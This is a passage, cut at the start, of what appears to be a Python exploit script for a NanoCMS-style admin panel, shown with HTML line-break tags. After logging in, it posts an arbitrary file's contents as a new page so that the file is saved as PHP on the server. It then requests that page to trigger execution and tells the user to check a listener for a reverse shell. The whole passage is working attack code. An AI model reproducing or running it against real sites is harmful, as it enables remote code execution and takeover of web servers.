"Upgrade-Insecure-Requests": "1",<br /> }<br /><br /> post_data = {<br /> "title": f"{random_filename.name}",<br /> "save": "Add Page",<br /> "check_sidebar": "sidebar",<br /> "content": f"{file_contents}"<br /> }<br /><br /> url_request = requests.post(<br /> address + 'data/nanoadmin.php?action=addpage',<br /> headers=post_header,<br /> data=post_data,<br /> verify=False,<br /> timeout=30<br /> )<br /> if url_request.status_code == 404:<br /> print(<br /> f"{settings.c1}{settings.i2}{arguments.option.address} could "<br /> f"not be uploaded.{settings.c0}"<br /> )<br /> sys.exit(1)<br /> else:<br /> print(<br /> f"{settings.c2}{settings.i1}file posted."<br /> f"{settings.c0}"<br /> )<br /><br /> print(<br /> f"{settings.i3}if successful, file location should be at:"<br /> f"\n{address}data/pages/{random_filename.name}.php"<br /> )<br /><br /><br />def execute(address, file, name):<br /> print(<br /> f"{settings.i3}making web request to uploaded file."<br /> )<br /> print(<br /> f"{settings.i3}check listener if reverse shell uploaded."<br /> )<br /> url_request = requests.get(<br /> address + f'data/pages/{random_filename.name}.php',<br /> verify=False<br /> )<br /> if url_request.status_code == 404:<br /> print(<br /> f"{settings.c1}{settings.i2}{arguments.option.file} could "<br /> f"not be found."<br /> f"\n{settings.i2}antivirus may be blocking your upload."<br /> f"{settings.c0}"<br /> )<br /> else:<br /> sys.exit()<br /><br /><br />def main():<br /> try:<br /> arguments()<br /> term_settings()<br /> address_check(arguments.option.address)<br /> random_filename()<br /> if arguments.option.execute:<br /> login(<br /> arguments.option.address,<br /> arguments.option.user,<br /> arguments.option.passwd<br /> )<br /> exploit(<br /> arguments.option.address,<br /> arguments.option.file,<br /> random_filename.name,<br /> )<br /> execute(<br /> arguments.option.address,<br /> arguments.option.file,<br /> random_filename.name,<br /> )<br /> else:<br /> login(<br /> arguments.option.address,<br /> arguments.option.user,<br /> arguments.option.passwd<br /> )<br /> exploit(<br /> arguments.option.address,<br /> arguments.option.file,<br /> random_filename.name,<br /> )<br /> except KeyboardInterrupt:<br /> print(f"\n{settings.i3}quitting.")<br /> sys.exit()<br /> except requests.exceptions.Timeout:<br /> print(<br /> f"{settings.c1}{settings.i2}the request timed out "<br /> f"while attempting to connect.{settings.c0}"<br /> )<br /> sys.exit()<br /> except requests.ConnectionError:<br /> print(<br /> f"{settings.c1}{settings.i2}could not connect "<br /> f"to {arguments.option.address}{settings.c0}"<br /> )<br /> sys.exit()<br /> except FileNotFoundError:<br /> print(<br /> f"{settings.c1}{settings.i2}{arguments.option.file} "<br /> f"could not be found.{settings.c0}"<br /> )<br /> except (<br /> requests.exceptions.MissingSchema,<br /> requests.exceptions.InvalidURL,<br /> requests.exceptions.InvalidSchema<br /> ):<br /> print(<br /> f"{settings.c1}{settings.i2}a valid schema and address "<br /> f"must be supplied.{settings.c0}"<br /> )<br /> sys.exit()<br /><br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>